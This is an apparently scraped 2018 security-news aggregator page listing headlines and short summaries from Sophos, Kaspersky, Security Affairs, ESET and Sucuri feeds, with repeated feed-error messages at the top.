Threat News Ledger

The server indicates that the URL has been redirected. Try using the Curl download option on the Syndicate Press Admin Panel Cache tab. After updating the settings, be sure to clear the input and output caches, then reload this page.
The server indicates that the URL has been redirected. Try using the Curl download option on the Syndicate Press Admin Panel Cache tab. After updating the settings, be sure to clear the input and output caches, then reload this page.
The server indicates that the URL has been redirected. Try using the Curl download option on the Syndicate Press Admin Panel Cache tab. After updating the settings, be sure to clear the input and output caches, then reload this page.
The server indicates that the URL has been redirected. Try using the Curl download option on the Syndicate Press Admin Panel Cache tab. After updating the settings, be sure to clear the input and output caches, then reload this page.
The server indicates that the URL has been redirected. Try using the Curl download option on the Syndicate Press Admin Panel Cache tab. After updating the settings, be sure to clear the input and output caches, then reload this page.
The server indicates that the URL has been redirected. Try using the Curl download option on the Syndicate Press Admin Panel Cache tab. After updating the settings, be sure to clear the input and output caches, then reload this page.
The server indicates that the URL has been redirected. Try using the Curl download option on the Syndicate Press Admin Panel Cache tab. After updating the settings, be sure to clear the input and output caches, then reload this page.
The server indicates that the URL has been redirected. Try using the Curl download option on the Syndicate Press Admin Panel Cache tab. After updating the settings, be sure to clear the input and output caches, then reload this page.

The following is the most recent public Cyber Threat news posted on Website

Sorry, the feed is not available at this time.
Sorry, the feed is not available at this time.

Naked Security - Sophos

News, opinion, advice and research on computer security threats from Sophos

Last feed update: Saturday March 17th, 2018 09:56:21 PM

5 Protective Ps to help you prevent network takeovers [VIDEO]

Saturday March 17th, 2018 02:37:18 PM Paul Ducklin
Recently, we've seen crooks unleashing ransomware and cryptojacking on whole networks at a time - so here are 5 tips to defend yourself.

Scarlett Johansson’s face lands starring role in database hack

Friday March 16th, 2018 02:56:50 PM Mark Stockley
A picture's worth a thousand words. And a few Monero.

The Chrome extension that knows it’s you by the way you type

Friday March 16th, 2018 01:56:16 PM John E Dunn
Using multi-factor authentication is more secure than relying on passwords alone - but could your typing make it even better?

YouTuber jailed after shooting boyfriend dead in failed prank

Friday March 16th, 2018 11:44:22 AM Lisa Vaas
In a horrific example of what people will do to go viral, she shot him from a foot away while he held up a thick book.

Facebook: we won’t share data with WhatsApp (yet)

Friday March 16th, 2018 11:02:33 AM Lisa Vaas
Facebook has signed a public commitment to keep its mitts off Whatsapp user data sharing, until it can do so legally.

YouTube conspiracy videos to get links to Wikipedia and other sources

Thursday March 15th, 2018 01:14:18 PM Lisa Vaas
Not all controversial conspiracy videos are getting this treatment, which will begin in coming months. Only those with "significant debate."

Firefox makes it easy to banish push notifications

Thursday March 15th, 2018 01:09:46 PM John E Dunn
The latest version of Firefox, version 59, contains a setting designed to let users control the bane of intrusive push notification requests.

Anti-anti-virus service provider tied to huge hacks cops plea

Thursday March 15th, 2018 12:51:07 PM Lisa Vaas
Jurijs Martisevs pled guilty to running a clearinghouse for criminal developers to see if anti-virus programs would detect their malware.

Former Equifax exec charged with stock dumping before breach disclosure

Thursday March 15th, 2018 12:40:24 PM Lisa Vaas
The SEC says that Jun Ying would have lost over $117,000 if he'd waited until after the public disclosure of the breach to sell his stocks.

Microsoft patches RDP vulnerability. Update now!

Thursday March 15th, 2018 12:32:55 PM Maria Varmazis
Microsoft has released a preliminary fix for a vulnerability rated Important and which is present in all supported versions of Windows in circulation.

Securelist - Kaspersky Lab’s cyberthreat research and reports

Online headquarters of Kaspersky Lab security experts.

Last feed update: Saturday March 17th, 2018 09:56:22 PM

Goodfellas, the Brazilian carding scene is after you

Thursday March 15th, 2018 10:00:49 AM Thiago Marques
There are three ways of doing things in the malware business: the right way, the wrong way and the way Brazilians do it. From the early beginnings, using skimmers on ATMs, compromising point of sales systems, or even modifying the hardware of processing devices, Latin America has been a fertile ground for collecting credit and debit cards en masse.

Time of death? A therapeutic postmortem of connected medicine

Tuesday March 13th, 2018 03:00:33 PM Denis Makrushin
At last year’s Security Analyst Summit 2017 we predicted that medical networks would be a titbit for cybercriminals. Unfortunately, we were right. The numbers of medical data breaches and leaks are increasing. According to public data, this year is no exception.

Somebody’s watching! When cameras are more than just ‘smart’

Monday March 12th, 2018 10:00:50 AM Vladimir Dashchenko
The researchers at Kaspersky Lab ICS CERT decided to check the popular smart camera to see how well protected it is against cyber abuses. This model has a rich feature list, compares favorably to regular webcams and can be used as a baby monitor, a component in a home security system or as part of a monitoring system.

Masha and these Bears

Friday March 9th, 2018 05:00:14 PM GReAT
Sofacy, also known as APT28, Fancy Bear, and Tsar Team, is a prolific, well resourced, and persistent adversary. They are sometimes portrayed as wild and reckless, but as seen under our visibility, the group can be pragmatic, measured, and agile.

The Slingshot APT FAQ

Friday March 9th, 2018 03:20:59 PM Alexey Shulmin
While analyzing some memory dumps suspicious of being infected with a keylogger, we identified a library containing strings to interact with a virtual file system. This turned out to be a malicious loader internally named “Slingshot”.

The devil’s in the Rich header

Thursday March 8th, 2018 05:00:37 PM GReAT
In our previous blog , we detailed our findings about the attack against the Pyeongchang 2018 WinterOlympics. For this investigation, our analysts were provided with administrative access to one of the affected servers located in a hotel based in Pyeongchang county, South Korea. In addition, we collected all available evidence from various private and public sources and worked with several companies on investigating the C&C infrastructure associated with the attackers.

OlympicDestroyer is here to trick the industry

Thursday March 8th, 2018 05:00:28 PM GReAT
A couple of days after the opening ceremony of the Winter Olympics in Pyeongchang, South Korea, we received information from several partners, on the condition of non-disclosure (TLP:Red), about a devastating malware attack on the Olympic infrastructure.

Mobile malware evolution 2017

Wednesday March 7th, 2018 10:00:29 AM Roman Unuchek
For the last few years, rooting malware has been the biggest threat to Android users. These Trojans are difficult to detect, boast an array of capabilities, and have been very popular among cybercriminals.

Mining is the new black

Monday March 5th, 2018 10:00:36 AM Anton Ivanov
Last year we published a story revealing the rise of miners across the globe. At the time we had discovered botnets earning millions of USD. We knew this was just the beginning of the story, which turned out to develop rapidly.

Financial Cyberthreats in 2017

Wednesday February 28th, 2018 10:00:59 AM Kaspersky Lab
This report summarizes a series of Kaspersky Lab reports that between them provide an overview of how the financial threat landscape has evolved over the years. It covers the common phishing threats, along with Windows-based and Android-based financial malware.

Failed to get content from ''
Failed to get content from ''
Failed to get content from ''
Sorry, the feed is not available at this time.

Security Affairs

Read, think, share … Security is everyone's responsibility

Last feed update: Saturday March 17th, 2018 09:56:25 PM

VMware addresses a DoS flaw in Workstation and Fusion products

Saturday March 17th, 2018 06:50:05 PM Pierluigi Paganini
VMware has addressed a denial-of-service (DoS) vulnerability, tracked as CVE-2018-6957, in its Workstation 12.x and 14.x and Fusion 10.1.1. and 10.x on OS X products. The affected VMware solutions can be attacked by opening a large number of VNC sessions. The DoS vulnerability was discovered by Lilith Wyatt of Cisco Talos, the flaw could be exploited on Workstation […] The post VMware addresses a DoS flaw in Workstation and Fusion products appeared first on Security Affairs.

Chinese APT Group TEMP.Periscope targets US Engineering and Maritime Industries

Saturday March 17th, 2018 04:49:26 PM Pierluigi Paganini
The China-linked APT group Leviathan. aka TEMP.Periscope, has increased the attacks on engineering and maritime entities over the past months. Past attacks conducted by the group aimed at targets connected to South China Sea issues, most of them were research institutes, academic organizations, and private firms in the United States. The group has also targeted professional/consulting services, high-tech industry, […] The post Chinese APT Group TEMP.Periscope targets US Engineering and Maritime Industries appeared first on Security Affairs.

Hackers awarded $267,000 at Pwn2Own 2018, was far less than in the past editions

Saturday March 17th, 2018 01:36:57 PM Pierluigi Paganini
At Pwn2Own 2018 the hackers received a total of $267,000, it was far less than in the past editions, but the quality of research was amazing. The popular hacking competition Pwn2Own is concluded, let’s see how much hackers earned and which applications they have successfully pwned. White hat hackers have earned a total of $267,000 at […] The post Hackers awarded $267,000 at Pwn2Own 2018, was far less than in the past editions appeared first on Security Affairs.

Popular Hacker Adrian Lamo, known for the case Chelsea Manning, is dead

Saturday March 17th, 2018 10:34:04 AM Pierluigi Paganini
The popular Hacker Adrian Lamo died at 37 age, the coroner confirmed his death, but the circumstances of his passing are still unknown. The popular hacker Adrian Lamo has died at 37, he is known for hacking a number of companies, including The New York Times in 2002., and turning the whistleblower Chelsea Manning into the FBI. […] The post Popular Hacker Adrian Lamo, known for the case Chelsea Manning, is dead appeared first on Security Affairs.

Hackers can elevate privileges by hacking into popular text editors

Friday March 16th, 2018 09:33:14 PM Pierluigi Paganini
Following recent string of attacks that exploit flawed plugins, researchers at SafeBreach examined 6 popular extensible text editors for unix systems. Most of the modern text editors allow users to extend their functionalities by using third-party plugins, in this way they are enlarging their attack surface. Third-party plugins could be affected by vulnerabilities that could […] The post Hackers can elevate privileges by hacking into popular text editors appeared first on Security Affairs.

GandCrab ransomware evolves thanks to an AGILE development process

Friday March 16th, 2018 01:58:56 PM Pierluigi Paganini
According to Check Point report, the authors of the prolific GandCrab ransomware are continuously improving their malware by adopting the AGILE development process. Early February experts at cyber security firm LMNTRIX have discovered a new ransomware-as-a-service dubbed GandCrab. advertised in Russian hacking community on the dark web. The GandCrab was advertised in Russian hacking communities, researchers noticed that […] The post GandCrab ransomware evolves thanks to an AGILE development process appeared first on Security Affairs.

Mossack Fonseca law firm shuts down operations 2 years after Panama Papers

Friday March 16th, 2018 08:00:47 AM Pierluigi Paganini
News of the day is that the Mossack Fonseca law firm would shut down operations due to the reputational damage caused by the Panama Papers security breach. The Panama Papers is a huge trove of strictly confidential documents from the Panamanian law firm Mossack Fonseca that was leaked online on April 3, 2016. The Panama Leaks were acquired […] The post Mossack Fonseca law firm shuts down operations 2 years after Panama Papers appeared first on Security Affairs.

Hacking SAP CRM by chaining 2 vulnerabilities in SAP NetWeaver AS Java

Friday March 16th, 2018 05:31:11 AM Pierluigi Paganini
Security experts at ERPScan explained that chaining 2 flaws recently patched it is possible to hack SAP CRM systems and access sensitive data. Security experts at ERPScan discovered that chaining the exploits for two security vulnerabilities in SAP NetWeaver Application Server Java patched last month, an attacker can hack customer relationship management (CRM) systems. CRMs are […] The post Hacking SAP CRM by chaining 2 vulnerabilities in SAP NetWeaver AS Java appeared first on Security Affairs.

The RottenSys botnet is already composed of nearly 5 million Android devices

Thursday March 15th, 2018 02:02:34 PM Pierluigi Paganini
RottenSys – A Chinese crime ring is building a huge botnet that is already composed of nearly 5 million Android device. Researchers at Check Point discovered attackers infecting the device with a strain of malware dubbed RottenSys that aggressively display ads on victims’ devices. “The Check Point Mobile Security Team has discovered a new widespread malware family […] The post The RottenSys botnet is already composed of nearly 5 million Android devices appeared first on Security Affairs.

VPN leaks affect 3 Major VPN vendors, only Hotspot Shield promptly fixed it

Thursday March 15th, 2018 12:38:49 PM Pierluigi Paganini
The website VPNMentor discovered that IP leak issues in three major VPN vendors, only Hotspot Shield VPN promptly fixed it. The website VPNMentor decided to hire a group of hackers to test popular virtual private networks (VPN) for vulnerabilities that can pose risk for the users. The results of the tests revealed that the solutions evaluated by the […] The post VPN leaks affect 3 Major VPN vendors, only Hotspot Shield promptly fixed it appeared first on Security Affairs.

Sorry, the feed is not available at this time.


News, views, and insight from the ESET security community

Last feed update: Saturday March 17th, 2018 09:56:24 PM

Tricks that cybercriminals use to hide in your phone

Friday March 16th, 2018 09:55:12 AM Denise Giusto Bilić

Malware in the official Google store never stops appearing. For cybercriminals, sneaking their malicious applications into the marketplace of genuine apps is a huge victory. The post Tricks that cybercriminals use to hide in your phone appeared first on WeLiveSecurity

Employers’ best bet for appealing to security pros? Value their opinions

Thursday March 15th, 2018 12:58:54 PM Tomáš Foltýn

The report also sheds light on how not to go about attracting new hires. Vague and inaccurate job descriptions along with job postings that include insufficient qualifications were found to top the list of turnoffs for many jobseekers The post Employers’ best bet for appealing to security pros? Value their opinions appeared first on WeLiveSecurity

How diversity in cybersecurity contributes to your company

Wednesday March 14th, 2018 06:15:53 PM Lysa Myers

Diverse background can contribute to your organization's security. Here are some tips to get more diversity in security perspectives. The post How diversity in cybersecurity contributes to your company appeared first on WeLiveSecurity

Mr. Robot S03E05: A Runtime Error, Credential Theft and New Easter Eggs

Wednesday March 14th, 2018 12:55:59 PM Josep Albors

The latest episode of this series marks the halfway point in the third season and, in addition to some amazing camerawork there are several examples of actions related to IT security that crop up throughout the episode. The post Mr. Robot S03E05: A Runtime Error, Credential Theft and New Easter Eggs appeared first on WeLiveSecurity

Dangerous malware stealing bitcoin hosted on for years

Wednesday March 14th, 2018 01:00:35 AM Peter Kálnai

ESET researchers dicovered that Trojanized applications used to steal bitcoin were hosted inadvertently by the popular website The post Dangerous malware stealing bitcoin hosted on for years appeared first on WeLiveSecurity

Cryptocurrency exchange announces bounty on hackers

Tuesday March 13th, 2018 02:17:32 PM Tomáš Foltýn

The attack itself unfolded within the span of two minutes on March 7. Hackers made a flurry of automated transactions that involved the digital currencies Viacoin (VIA) and Bitcoin (BTC). The post Cryptocurrency exchange announces bounty on hackers appeared first on WeLiveSecurity

OceanLotus ships new backdoor using old tricks

Tuesday March 13th, 2018 08:55:21 AM Tomáš Foltýn

To smuggle the backdoor onto a targeted machine, the group uses a two-stage attack whereby a dropper package first gains a foothold on the system and sets the stage for the backdoor itself. This process involves some trickery commonly associated with targeted operations of this kind. The post OceanLotus ships new backdoor using old tricks appeared first on WeLiveSecurity

New traces of Hacking Team in the wild

Friday March 9th, 2018 05:01:27 PM Filip Kafka

Since being founded in 2003, the Italian spyware vendor Hacking Team gained notoriety for selling surveillance tools to governments and their agencies across the world. The capabilities of its flagship product, the Remote Control System (RCS), include extracting files from a targeted device, intercepting emails and instant messaging, as well as remotely activating a device’s webcam and microphone. The post New traces of Hacking Team in the wild appeared first on WeLiveSecurity

One in five healthcare employees willing to sell patient data, study finds

Friday March 9th, 2018 10:35:11 AM Tomáš Foltýn

The problem was particularly acute among provider organizations, as opposed to payer organizations (21% vs. 12%). Also, and perhaps counterintuitively, staff with more frequent cybersecurity training were more inclined to such practices. The post One in five healthcare employees willing to sell patient data, study finds appeared first on WeLiveSecurity

New DDoS attack method breaks record again, adds extortion

Thursday March 8th, 2018 01:41:34 PM Tomáš Foltýn

DDoS mitigation service Arbor Networks has announced that an undisclosed US company has suffered an attack fueled by internet-facing Memcached servers that clocked in at 1.7 terabits per second (Tbps), beating the previous record of 1.35 Tbps. The post New DDoS attack method breaks record again, adds extortion appeared first on WeLiveSecurity

Trends 2018: The ransomware revolution

Wednesday March 7th, 2018 01:52:11 PM David Harley

While Denial of Service attacks amplified by the use of networks of bot-compromised PCs were becoming a notable problem by the turn of the century, DDoS extortion threats have accelerated in parallel (if less dramatically) with the rise in ransomware in the past few years. The post Trends 2018: The ransomware revolution appeared first on WeLiveSecurity

Cryptojacking: the result of the “cryptocurrency rush”

Tuesday March 6th, 2018 11:16:37 AM Miguel Ángel Mendoza

Tools for mining cryptocurrencies also fall into this category, as in many cases the websites cannot warn users since they have been compromised themselves, hence even the administrators may not be aware that they are contributing to mining for the benefit of an attacker. The post Cryptojacking: the result of the “cryptocurrency rush” appeared first on WeLiveSecurity

Global police test their cyber-chops in simulated IoT attack

Monday March 5th, 2018 02:06:26 PM Tomáš Foltýn

More than three dozen cybercrime and digital forensics experts from 23 countries have investigated a simulated attack on a bank that had been carried out through an IoT device. The post Global police test their cyber-chops in simulated IoT attack appeared first on WeLiveSecurity

GitHub knocked briefly offline by biggest DDoS attack ever

Friday March 2nd, 2018 03:38:37 PM Tomáš Foltýn

At its peak, inbound traffic reached a staggering 1.35 terabits per second (Tbps), outflanking the previously record-setting assault of 1 Tbps at French web hosting provider OVH in September 2016. The post GitHub knocked briefly offline by biggest DDoS attack ever appeared first on WeLiveSecurity

The rise of AI needs to be controlled, report warns

Friday March 2nd, 2018 12:32:33 PM Tomáš Foltýn

The experts urge policy-makers to work closely with technical researchers, computer scientists and the cybersecurity community to investigate, understand and prepare for possible malicious uses of AI. The post The rise of AI needs to be controlled, report warns appeared first on WeLiveSecurity

How to start analyzing the security of your IoT devices

Friday March 2nd, 2018 10:01:20 AM Cecilia Pastorino

The big challenge with IoT devices is that they are all different: Each manufacturer has its own firmware, uses different protocols, and designs its own architecture. So, the first step before carrying out any analysis is to understand the architecture, find out what components are involved, and how they interact and communicate among themselves. The post How to start analyzing the security of your IoT devices appeared first on WeLiveSecurity

Mobile World Congress: Introducing 5G

Thursday March 1st, 2018 02:25:29 PM Tony Anscombe

If we look back at previous incarnations of mobile networks, 1G, 2G and so on, there have been major changes to the technology. The next generation, 5G, delivers greater speed and lower latency, but also has the advantage of being able to connect many more devices concurrently. The post Mobile World Congress: Introducing 5G appeared first on WeLiveSecurity

Major reform of cybersecurity policies in France

Thursday March 1st, 2018 09:35:50 AM Gabrielle Ladouceur Despins

This document, which is described by its authors as a “real white paper on cyber-defense”, is divided into three parts, followed by approximately 20 priority recommendations summarizing the central elements of the document. The post Major reform of cybersecurity policies in France appeared first on WeLiveSecurity

Researchers unveil Veil to make ‘private browsing more private’

Wednesday February 28th, 2018 12:18:03 PM Tomáš Foltýn

The blinding server randomly adds some nonsense code to every webpage. This ‘code obfuscation’, according to the academics, has no effect on what the actual page looks like, but it drastically changes the appearance of the underlying source file. The post Researchers unveil Veil to make ‘private browsing more private’ appeared first on WeLiveSecurity

Cryptocurrency scams on Android: do you know what to watch out for?

Wednesday February 28th, 2018 08:58:14 AM Lukas Stefanko

The recent rise in cryptocurrency scams appearing on the Android platform in disguise has shown that such incidents are not exclusive to PCs and also highlight the importance of knowing what to look out for so you do not unintentionally take part. The post Cryptocurrency scams on Android: do you know what to watch out for? appeared first on WeLiveSecurity

SEC says insider trading is not the right response to cyber risk

Tuesday February 27th, 2018 12:07:51 PM Graham Cluley

The SEC has warned public companies that they not only need to do more to fulfil their obligations to transparency and openness with investors about cybersecurity breaches, but they also must disclose other infosecurity risks. The post SEC says insider trading is not the right response to cyber risk appeared first on WeLiveSecurity

One-third of organizations sacrifice mobile security for business performance

Tuesday February 27th, 2018 10:21:19 AM Tomáš Foltýn

Only one in seven organizations have put in place all four basic cybersecurity practices specified by Verizon – changing all default passwords, encrypting data transmitted over public networks, granting employee access on a need-to-know basis, and testing security systems regularly. The post One-third of organizations sacrifice mobile security for business performance appeared first on WeLiveSecurity

Over 40% of online login attempts are attackers trying to invade accounts

Monday February 26th, 2018 01:47:46 PM Tomáš Foltýn

Bots that traverse the internet on behalf of their human operators can fulfill both legitimate and malicious automated tasks. Statistics indicate that bot-driven internet traffic, by helper and harmful bots combined, surpasses human traffic. The post Over 40% of online login attempts are attackers trying to invade accounts appeared first on WeLiveSecurity

Privacy by Design: Can you create a safe smart home?

Monday February 26th, 2018 10:00:26 AM Tony Anscombe

The Internet of Things (IoT) can be a network of connected convenience but this should not come at the expense of safeguarding your privacy and the personal data that connected devices collect and share. The post Privacy by Design: Can you create a safe smart home? appeared first on WeLiveSecurity

Six tips to help you avoid targeted marketing

Friday February 23rd, 2018 10:10:50 AM Lysa Myers

If you get sick of shopping sites sending you “I see you stared at this item, here’s some similar stuff” messages, you may be able to modify your subscriptions or notifications to make this stop. The post Six tips to help you avoid targeted marketing appeared first on WeLiveSecurity

Survey shows sloppy password habits among young Brits

Thursday February 22nd, 2018 03:08:51 PM Tomáš Foltýn

Young people were singled out as increasingly likely victims of internet-borne fraud, including because of their penchant for liberal sharing of personal information. The post Survey shows sloppy password habits among young Brits appeared first on WeLiveSecurity

Friendly warnings left in unsecured Amazon S3 buckets which expose private data

Thursday February 22nd, 2018 01:01:45 PM Graham Cluley

Ethical hackers are warning businesses who use Amazon S3 cloud storage if they have left data exposed for anyone to access... by leaving "friendly warnings" on the servers. The post Friendly warnings left in unsecured Amazon S3 buckets which expose private data appeared first on WeLiveSecurity

Apple defuses ‘text bomb’ bug

Wednesday February 21st, 2018 02:51:50 PM Tomáš Foltýn

A number of text-based apps crashed, became unresponsive or entered an endless bootloop when attempting to show the otherwise little-used character from a language that is spoken by some 75 million people. The post Apple defuses ‘text bomb’ bug appeared first on WeLiveSecurity

Cybercrime weighs most heavily on financial service firms

Tuesday February 20th, 2018 03:19:01 PM Tomáš Foltýn

A further breakdown of the overall figures shows that, in all, the actual cost hinges on a number of variables. The factors that enter heavily into the equation include attack types and their frequency, along with the organization’s size and even the country in which an organization is based. The post Cybercrime weighs most heavily on financial service firms appeared first on WeLiveSecurity

Millions bagged in two bank cyber-heists

Monday February 19th, 2018 03:22:26 PM Tomáš Foltýn

This hack is said to be reminiscent of a particularly brazen bank cyber-heist from February 2016, in which hackers successfully pilfered $81 million from the account of the central bank of Bangladesh at the Federal Reserve Bank of New York. The post Millions bagged in two bank cyber-heists appeared first on WeLiveSecurity

US forms dedicated office to help avert cyberattacks on infrastructure

Friday February 16th, 2018 02:17:41 PM Tomáš Foltýn

The vulnerability of critical infrastructure, including energy grids, to cyberattacks has been a growing concern worldwide. Many nations have been scrambling to improve their defenses vis-à-vis threats faced by services that are critical to the continuity of our daily lives. The post US forms dedicated office to help avert cyberattacks on infrastructure appeared first on WeLiveSecurity

Concerns about data breaches hitting all-time high

Thursday February 15th, 2018 01:47:52 PM Tomáš Foltýn

A record-high proportion of organizations worldwide (67%) said that they had been breached at some point, up from 56% in the report’s previous edition. The post Concerns about data breaches hitting all-time high appeared first on WeLiveSecurity

Android ransomware in 2017: Innovative infiltration and rougher extortion

Thursday February 15th, 2018 10:00:40 AM Ondrej Kubovič

Ransomware in 2017 saw users and businesses across the globe trying to cope with campaigns such as Petya and WannaCryptor. Not to be outdone, Android ransomware had a year full of innovative infiltration and rougher extortion as highlighted by the latest ESET research whitepaper. The post Android ransomware in 2017: Innovative infiltration and rougher extortion appeared first on WeLiveSecurity

Patch now! Microsoft fixes over 50 serious security flaws

Wednesday February 14th, 2018 02:30:52 PM Graham Cluley

This week saw the second Tuesday of the month, and everyone who is responsible for protecting Windows computers knows what that means: another bundle of security patches have been released by Microsoft. The post Patch now! Microsoft fixes over 50 serious security flaws appeared first on WeLiveSecurity

How safe are you around your smart TV?

Wednesday February 14th, 2018 12:58:10 PM Tomáš Foltýn

Smart TVs afford us the opportunity to use them for purposes that are more commonly associated with computers. In fact, that’s what these TVs have become – internet-connected ‘computers’, much like mobile phones. It would no doubt help if we thought of them as such and treated them accordingly. The post How safe are you around your smart TV? appeared first on WeLiveSecurity

Blockchain Hardened devices: Can they restore privacy with security by design?

Tuesday February 13th, 2018 12:56:20 PM Tony Anscombe

These developments show that security technology is now keeping up, or outpacing other technological and regulatory developments. Thus, while users’ wants often continue to trump their appreciation of risk, the industry has responded and in many cases gotten ahead of popular demand. The post Blockchain Hardened devices: Can they restore privacy with security by design? appeared first on WeLiveSecurity

US and UK government websites hijacked to mine cryptocurrency on visitors’ machines

Monday February 12th, 2018 02:49:02 PM Tomáš Foltýn

If undetected by a user’s security solution or content- or ad-blocker, the script ran in the background unbeknown to the user until the webpage was closed. A number of the affected websites, including that of the ICO, were also offline for hours in the aftermath of the attack. The post US and UK government websites hijacked to mine cryptocurrency on visitors’ machines appeared first on WeLiveSecurity

All HTTP websites to soon be marked as “not secure” by Google Chrome

Monday February 12th, 2018 10:51:47 AM Graham Cluley

If you're still running a website that is still using insecure HTTP then it's time to wake up and drink the coffee. Because unless you take action soon, you're going to find many of your visitors are going to distrust your website. The post All HTTP websites to soon be marked as “not secure” by Google Chrome appeared first on WeLiveSecurity

How will WPA3 improve WiFi security?

Friday February 9th, 2018 10:04:08 AM Cecilia Pastorino

This is aimed at improving security at the time of the handshake, which is when the key is being exchanged. As a result, WPA3 is poised to provide robust security even if short or weak passwords are used, i.e. those that don’t contain a combination of letters, numbers and symbols. The post How will WPA3 improve WiFi security? appeared first on WeLiveSecurity

Global cybercrime behemoth busted, 36 people indicted

Thursday February 8th, 2018 02:42:23 PM Tomáš Foltýn

According to US authorities, the enterprise aimed at becoming the premier destination for the buying and selling of stolen payment card data and forged identification documents. It is believed that the losses that the Infraud Organization had intended to cause were north of $2.2 billion. The post Global cybercrime behemoth busted, 36 people indicted appeared first on WeLiveSecurity

UK-led police operation quashes Luminosity Link RAT

Wednesday February 7th, 2018 02:19:08 PM Tomáš Foltýn

The investigation showed that the tool, which required little technical knowledge to deploy, had over 8,600 users in 78 countries. Victims are believed to be in the thousands. The post UK-led police operation quashes Luminosity Link RAT appeared first on WeLiveSecurity

FBI warns of email scams claiming to be from Bureau

Tuesday February 6th, 2018 01:11:11 PM Tomáš Foltýn

Another template attempts to scare, rather than thrill, the recipients. Upon learning that “your IP address and other identifying information were used to commit multiple online crimes”, the mark is urged to contact the sender by phone immediately. The post FBI warns of email scams claiming to be from Bureau appeared first on WeLiveSecurity

Think you have a tracker on your phone? Learn how to make your device more resilient

Tuesday February 6th, 2018 10:56:11 AM Lysa Myers

While it certainly doesn’t hurt to ask for help from local law enforcement, know that even major cities may not have the expertise or the bandwidth to investigate compromised mobile devices. The most important objective is to take steps to make sure you’re safe. Ask for help, but do not wait for others to help you. The post Think you have a tracker on your phone? Learn how to make your device more resilient appeared first on WeLiveSecurity

Vulnerabilities reached a historic peak in 2017

Monday February 5th, 2018 10:07:27 AM Miguel Ángel Mendoza

In 2017, the number of vulnerabilities smashed records set in previous years. According to CVE Details, more than 14,600 vulnerabilities were reported in 2017, compared to 6447 in 2016. The post Vulnerabilities reached a historic peak in 2017 appeared first on WeLiveSecurity

Smart, Smarter… Dumbest…

Friday February 2nd, 2018 10:00:58 AM Righard Zwienenberg

While the evolution of new smartphones creates more possibilities for the user, these new devices also creates more possibilities for hackers. The post Smart, Smarter… Dumbest… appeared first on WeLiveSecurity

Google smashed over 700,000 bad Android apps last year

Wednesday January 31st, 2018 02:17:46 PM Graham Cluley

Google says that it is getting better than ever at protecting Android users against bad apps and malicious developers. The post Google smashed over 700,000 bad Android apps last year appeared first on WeLiveSecurity

Privacy of fitness tracking apps in the spotlight after soldiers’ exercise routes shared online

Tuesday January 30th, 2018 11:44:09 AM Graham Cluley

People exercising on far-flung military bases are being exposed by their fitness tracker. The post Privacy of fitness tracking apps in the spotlight after soldiers’ exercise routes shared online appeared first on WeLiveSecurity

Babies’ personal data hawked on dark web

Friday January 26th, 2018 03:15:20 PM Tomáš Foltýn

The price puts the data records at a significant premium when compared to other stolen datasets. While, in general, many adverts in the dark recesses of the internet are fake, children’s personally identifiable information (PII) has for long been viewed as a particularly valuable commodity. The post Babies’ personal data hawked on dark web appeared first on WeLiveSecurity

FriedEx: BitPaymer ransomware the work of Dridex authors

Friday January 26th, 2018 01:57:43 PM Michal Poslušný

ESET research has found that the ransomware FriedEx, also known as BitPaymer, is actually the work of the notorious gang responsible for the Dridex banking trojan. The post FriedEx: BitPaymer ransomware the work of Dridex authors appeared first on WeLiveSecurity

Jail for man who hacked 1000 student email accounts in search for sexually explicit images

Friday January 26th, 2018 01:02:13 PM Graham Cluley

A poorly-secured password reset utility allowed a man to access more than 1,000 email accounts at a New York City-area university in a hunt for sexually explicit photographs and videos. The post Jail for man who hacked 1000 student email accounts in search for sexually explicit images appeared first on WeLiveSecurity

Sucuri Blog

Protect Your Interwebs!

Last feed update: Saturday March 17th, 2018 09:56:24 PM

FBI Public Service Annoucement: Defacements Exploiting WordPress Vulnerabilities

Wednesday April 8th, 2015 12:24:11 AM Daniel Cid
The US Federal Bureau of Investigation (FBI) just released a public service announcement (PSA) to the public about a large number of websites being exploited and compromised through WordPress plugin vulnerabilities: Continuous Web site defacements are being perpetrated by individuals sympathetic to the Islamic State in the Levant (ISIL) a.k.a. Islamic State of Iraq andRead More

Security Advisory: Persistent XSS in WP-Super-Cache

Tuesday April 7th, 2015 03:12:29 PM Marc-Alexandre Montpas
Security Risk: Dangerous Exploitation level: Very Easy/Remote DREAD Score: 8/10 Vulnerability: Persistent XSS Patched Version:  1.4.4 During a routine audit for our Website Firewall (WAF), we discovered a dangerous Persistent XSS vulnerability affecting the very popular WP-Super-Cache plugin (more than a million active installs according to The security issue, as well as another bug-fixRead More

Website Malware – The SWF iFrame Injector Evolves

Thursday April 2nd, 2015 03:56:00 PM Peter Gramantik
Last year, we released a post about a malware injector found in an Adobe Flash (.SWF) file. In that post, we showed how a .SWF file is used to inject an invisible, malicious iFrame. It appears that the author of that Flash malware continued with this method of infection. Now we are seeing more varietiesRead More

Intro to E-Commerce and PCI Compliance – Part I

Tuesday March 31st, 2015 09:14:15 PM Daniel Cid
Have you ever heard of the term PCI? Specifically, PCI compliance? If you have an e-commerce website, you probably have already heard about it. But do you really understand what it means for you and your online business? In this series, we will try to explain the PCI standard and how it affects you andRead More

WordPress Malware Causes Psuedo-Darkleech Infection

Thursday March 26th, 2015 09:00:37 AM Denis Sinegubko
Darkleech is a nasty malware infection that infects web servers at the root level. It use malicious Apache modules to add hidden iFrames to certain responses. It’s difficult to detect because the malware is only active when both server and site admins are not logged in, and the iFrame is only injected once a dayRead More

Why Website Reinfections Happen

Tuesday March 24th, 2015 04:38:52 AM Valentin
I joined Sucuri a little over a month ago. My job is actually as a Social Media Specialist, but we have this process where regardless of your job you have to learn what website infections look like and more importantly, how to clean them. It’s this idea that regardless of you are you must alwaysRead More

The Impacts of a Hacked Website

Thursday March 19th, 2015 01:15:37 PM Tony Perez
Today, with the proliferation of open-source technologies like WordPress, Joomla! and other Content Management Systems (CMS) people around the world are able to quickly establish a virtual presence with little to no cost. In the process however, a lot is being lost in terms of what it means to own a website. We are failingRead More

Understanding WordPress Plugin Vulnerabilities

Tuesday March 17th, 2015 05:19:42 PM Daniel Cid
The last 7 days have been very busy with a number of vulnerabilities being disclosed on multiple WordPress plugins. Some of them are minor issues, some are more relevant, while others are what we’d categorize as noise. How are you supposed to make sense of all this? To help provide some clarity on the influxRead More

Inverted WordPress Trojan

Wednesday March 11th, 2015 06:40:16 PM Denis Sinegubko
Trojan (or trojan horse) is software that does (or pretends to be doing) something useful but also contains a secret malicious payload that inconspicuously does something bad. In WordPress, typical trojans are plugins and themes (usually pirated) which may have backdoors, or send out spam, create doorways, inject hidden links or malware. The trojan modelRead More

Security Advisory: MainWP-Child WordPress Plugin

